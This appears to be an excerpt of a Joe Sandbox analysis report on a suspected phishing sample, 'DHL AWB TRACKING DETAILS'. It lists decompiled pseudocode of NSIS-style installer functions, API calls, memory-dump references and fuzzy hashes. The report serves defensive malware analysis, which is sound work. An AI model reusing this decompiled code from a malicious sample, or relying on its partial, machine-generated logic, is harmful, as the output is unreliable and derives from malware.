                    • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                    • SetDlgItemTextA.USER32 ref: 00404549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$C:\Users\user\AppData\Local\Temp$gdsanv
                    • API String ID: 2246997448-3093529516
                    • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                    • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                    • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                    • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405AA7 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 195stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x5169b1
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x514f2c
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x74691340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}































                    0x00405aa7
                    0x00405aa7
                    0x00405aa7
                    0x00405aad
                    0x00405ab2
                    0x00405ab4
                    0x00405ac3
                    0x00405ac3
                    0x00405ac5
                    0x00405ace
                    0x00405ad0
                    0x00405ad5
                    0x00405ad8
                    0x00405ad9
                    0x00405ae0
                    0x00405ae2
                    0x00405ae8
                    0x00405aeb
                    0x00405aeb
                    0x00405cc0
                    0x00405cc0
                    0x00405cc4
                    0x00000000
                    0x00000000
                    0x00405af8
                    0x00405afe
                    0x00000000
                    0x00000000
                    0x00405b04
                    0x00405b05
                    0x00405b08
                    0x00405b0b
                    0x00405cb3
                    0x00405cbd
                    0x00405cbf
                    0x00405cbf
                    0x00405cb5
                    0x00405cb7
                    0x00405cb9
                    0x00405cba
                    0x00405cba
                    0x00000000
                    0x00405cb3
                    0x00405b11
                    0x00405b15
                    0x00405b1a
                    0x00405b29
                    0x00405b2c
                    0x00405b2e
                    0x00405b33
                    0x00405b36
                    0x00405b39
                    0x00405b3c
                    0x00405b3f
                    0x00405b42
                    0x00405c5d
                    0x00405c60
                    0x00405c90
                    0x00405c93
                    0x00405c98
                    0x00405c9c
                    0x00405c9c
                    0x00405ca1
                    0x00405ca2
                    0x00405ca7
                    0x00405caa
                    0x00405cac
                    0x00000000
                    0x00405cac
                    0x00405c62
                    0x00405c65
                    0x00405c7a
                    0x00405c81
                    0x00405c67
                    0x00405c6e
                    0x00405c6e
                    0x00405c89
                    0x00405c8c
                    0x00405c55
                    0x00405c56
                    0x00405c56
                    0x00000000
                    0x00405c8c
                    0x00405b4a
                    0x00405b4b
                    0x00405b51
                    0x00405b53
                    0x00405b6d
                    0x00405b6d
                    0x00405b74
                    0x00405b74
                    0x00405b7b
                    0x00405b7f
                    0x00405b7f
                    0x00405b80
                    0x00405b82
                    0x00405bbb
                    0x00405bbe
                    0x00405bce
                    0x00405bd1
                    0x00405bd9
                    0x00405bdf
                    0x00405bdf
                    0x00405c3b
                    0x00405c3b
                    0x00405c3d
                    0x00000000
                    0x00000000
                    0x00405be3
                    0x00405bea
                    0x00405beb
                    0x00405bed
                    0x00405c07
                    0x00405c15
                    0x00405c1b
                    0x00405c1d
                    0x00405c38
                    0x00405c38
                    0x00405c38
                    0x00000000
                    0x00405c38
                    0x00405c23
                    0x00405c2e
                    0x00405c34
                    0x00405c36
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c36
                    0x00405bef
                    0x00405bf2
                    0x00000000
                    0x00000000
                    0x00405c01
                    0x00405c03
                    0x00405c05
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c05
                    0x00000000
                    0x00405c3b
                    0x00405bc6
                    0x00000000
                    0x00405b84
                    0x00405b89
                    0x00405b9f
                    0x00405ba4
                    0x00405ba7
                    0x00405c44
                    0x00405c44
                    0x00405c48
                    0x00405c50
                    0x00405c50
                    0x00000000
                    0x00405c48
                    0x00405bb1
                    0x00405c3f
                    0x00405c3f
                    0x00405c42
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c42
                    0x00405b82
                    0x00405b55
                    0x00405b59
                    0x00000000
                    0x00000000
                    0x00405b5b
                    0x00405b5f
                    0x00000000
                    0x00000000
                    0x00405b61
                    0x00405b65
                    0x00000000
                    0x00405b67
                    0x00405b67
                    0x00000000
                    0x00405b67
                    0x00405b65
                    0x00405cca
                    0x00405cd4
                    0x00405ce0
                    0x00405ce0
                    0x00000000

                    APIs
                    • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                    • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                    • GetWindowsDirectoryA.KERNEL32(gdsanv,00000400), ref: 00405BD9
                    • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                    • SHGetPathFromIDListA.SHELL32(00000000,gdsanv), ref: 00405C23
                    • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                    • lstrcatA.KERNEL32(gdsanv,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                    • lstrlenA.KERNEL32(gdsanv,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                    • String ID: ,OQ$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$gdsanv
                    • API String ID: 900638850-2961400793
                    • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                    • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                    • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                    • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                    0x0040201b
                    0x00402025
                    0x0040202e
                    0x00402038
                    0x00402041
                    0x0040204b
                    0x0040204f
                    0x0040204f
                    0x00402054
                    0x00402065
                    0x0040206d
                    0x0040214d
                    0x0040214d
                    0x00402154
                    0x00402073
                    0x00402073
                    0x00402084
                    0x00402088
                    0x0040208e
                    0x00402098
                    0x0040209a
                    0x004020a5
                    0x004020a8
                    0x004020b5
                    0x004020b7
                    0x004020b9
                    0x004020c0
                    0x004020c3
                    0x004020c3
                    0x004020c6
                    0x004020d0
                    0x004020d8
                    0x004020dd
                    0x004020e9
                    0x004020e9
                    0x004020ec
                    0x004020f5
                    0x004020f8
                    0x00402101
                    0x00402106
                    0x00402118
                    0x00402127
                    0x00402129
                    0x00402135
                    0x00402135
                    0x00402127
                    0x00402137
                    0x0040213d
                    0x0040213d
                    0x00402140
                    0x00402146
                    0x0040214b
                    0x00402160
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040214b
                    0x00402156
                    0x00402880
                    0x0040288c

                    APIs
                    • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 123533781-1104044542
                    • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                    • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                    • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                    • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                    0x00402648
                    0x0040265c
                    0x00402667
                    0x00402668
                    0x004027a3
                    0x0040264a
                    0x0040264a
                    0x0040264c
                    0x0040264e
                    0x0040264e
                    0x00402880
                    0x0040288c

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                    • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                    • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                    • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 023809FB Relevance: .4, Instructions: 351COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 53854e059d31078de7f50ce34d8e3abcfc16b3f73438acd4eb36df432d077a21
                    • Instruction ID: 771fd6e1950363fa939ae63f9290fedcd4bd40b2c3fb95ba28a3c11efb02515f
                    • Opcode Fuzzy Hash: 53854e059d31078de7f50ce34d8e3abcfc16b3f73438acd4eb36df432d077a21
                    • Instruction Fuzzy Hash: 57F1F41485D2EDADDB06CBF945603FDBFB05E2A102F4845C6E0E5E6283C53A938EDB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 02380616 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                    • Instruction ID: 4a1a8568b93cd374ce645f34a7f13f01fd70c5fafd6bd14fc2d568dcb4f3f81d
                    • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                    • Instruction Fuzzy Hash: EA110C71A10214EFCB24EFA9C4888AEF7FDEF856947544065F805DB314E770DE44C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 02380706 Relevance: .0, Instructions: 26COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                    • Instruction ID: 58c037d4c4df75791df5cb5448cc1fe0a5e45ee477fe5de95258a124d7ac4ca9
                    • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                    • Instruction Fuzzy Hash: 12E09A357606089FCB18DBB8C881D65B3F8EB09320B004290F819CB3A0EB34EE04DA90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 02380744 Relevance: .0, Instructions: 23COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                    • Instruction ID: 1cea1d94a7a63c37b88b8a9bf5eaa3777ae6422a072778b267ab733fff9096b3
                    • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                    • Instruction Fuzzy Hash: 7AE08C3A3107108BC335EA59D980992F3EAFB882B0719486AF89ADB721C330FC04CE50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 023806C7 Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403964 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
